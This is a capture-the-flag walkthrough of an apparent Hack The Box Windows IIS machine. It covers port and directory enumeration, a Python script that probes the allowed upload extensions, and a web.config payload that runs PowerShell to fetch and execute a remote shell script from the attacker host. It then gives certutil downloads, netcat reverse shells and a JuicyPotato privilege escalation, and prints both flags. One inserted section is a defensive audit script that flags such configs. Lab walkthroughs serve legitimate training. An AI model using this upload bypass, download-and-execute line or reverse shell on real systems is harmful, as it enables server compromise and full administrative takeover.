Service overview
Let's scan the ports with nmapAutomator and then enumerate the web root with gobuster:
$ nmapAutomator.sh -H 10.10.10.93 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$ gobuster dir --url http://10.10.10.93/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,txt,pdf
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
Script
Let's write a script for the page http://10.10.10.93/transfer.aspx that checks which upload extensions the form accepts:
$ nano checker.py
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup

url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"

def upload(f):
    # One session so the ASP.NET form state and the POST share cookies
    s = requests.Session()
    r = s.get(url)
    # __VIEWSTATE and __EVENTVALIDATION are tied to the page; without them
    # the server rejects the POST, so pull the current values from the form
    p = BeautifulSoup(r.content, "html.parser")
    viewState = p.find(attrs={'name': '__VIEWSTATE'})['value']
    eventValidation = p.find(attrs={'name': '__EVENTVALIDATION'})['value']
    postData = {
        '__VIEWSTATE': viewState,
        '__EVENTVALIDATION': eventValidation,
        'btnUpload': 'Upload'
    }
    # The file body is irrelevant here; only the name (extension) is tested
    uploadedFile = {'FileUpload1': (f, 'test')}
    r = s.post(url, files=uploadedFile, data=postData)
    return r.text

print("[INFO] Allowed Extensions:")
for i in open(filename, 'r'):
    ext = i.strip()
    if not ext:
        continue
    response = upload('bigb0ss.' + ext)
    if "successfully" in response:
        print("[+] %s" % ext)
$ nano extension.txt
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js
$ python3 checker.py
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config
Let's put our payload into web.config:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.6/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
Let's write the Nishang shell into shell.ps1 and upload web.config:
python3 -m http.server 80
rlwrap nc -lnvp 1234
curl http://10.10.10.93/uploadedfiles/web.config
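As an added example (not part of the original writeup), a defender-side audit that parses a web.config found under an upload directory and flags the three things the payload above depends on: a handler mapping a path pattern to a script engine, .config removed from the request-filtering block list, and web.config removed from hiddenSegments, plus ASP delimiters tucked into an XML comment. The sample config is constructed here to mirror the one above, and audit_web_config is a hypothetical helper name.

```python
#!/usr/bin/python3
import re
import xml.etree.ElementTree as ET

# Constructed sample that mirrors the web.config used above (handler mapping,
# request-filtering removals, script delimiters inside an XML comment).
SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security><requestFiltering>
      <fileExtensions><remove fileExtension=".config" /></fileExtensions>
      <hiddenSegments><remove segment="web.config" /></hiddenSegments>
    </requestFiltering></security>
  </system.webServer>
</configuration>
<!-- <% Response.Write("x") %> -->
"""

def audit_web_config(xml_text):
    """Return a list of findings for a web.config found under an upload folder.
    audit_web_config is a hypothetical helper written for this example."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    # 1. A handler that hands some path pattern to a script engine (ISAPI/CGI).
    for h in root.iter("add"):
        sp = h.get("scriptProcessor") or ""
        if h.get("path") and sp:
            findings.append("handler maps %s to %s" % (h.get("path"), sp))
    # 2. Request filtering weakened: .config no longer blocked, web.config no longer hidden.
    for rem in root.iter("remove"):
        if (rem.get("fileExtension") or "").lower() == ".config":
            findings.append(".config removed from blocked fileExtensions")
        if (rem.get("segment") or "").lower() == "web.config":
            findings.append("web.config removed from hiddenSegments")
    # 3. ASP delimiters hidden in an XML comment (parsers ignore it, asp.dll does not).
    for comment in re.findall(r"<!--(.*?)-->", xml_text, re.S):
        if "<%" in comment and "%>" in comment:
            findings.append("ASP script block inside XML comment")
    return findings

if __name__ == "__main__":
    for f in audit_web_config(SAMPLE):
        print("[!] " + f)
```

Running it over every web.config under uploadedfiles (a directory that should never contain one) turns the upload described above into a detectable event rather than a silent bypass.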
User flag
PS C:\users\merlin\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\merlin\desktop> type user.txt
e29ad89891462e0b09741e3082f44a2f
Privilege escalation
We'll simply use JuicyPotato: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe
On the local machine:
python3 -m http.server
rlwrap nc -lnvp 1235
rlwrap nc -lnvp 1236
On the remote machine:
> certutil -urlcache -f "http://10.10.14.8/JuicyPotatoX86.exe" js.exe
> certutil -urlcache -f "http://10.10.14.8/nc.exe" nc.exe
> nc.exe 10.10.14.6 1235
> jp.exe -l 1234 -p nc.exe -a "10.10.14.6 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}
(a non-default CLSID for Windows 2008 has to be taken from here: https://ohpe.it/juicy-potato/CLSID/)
Root flag
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
c837f7b699feef5475a0c079f9d4f5ea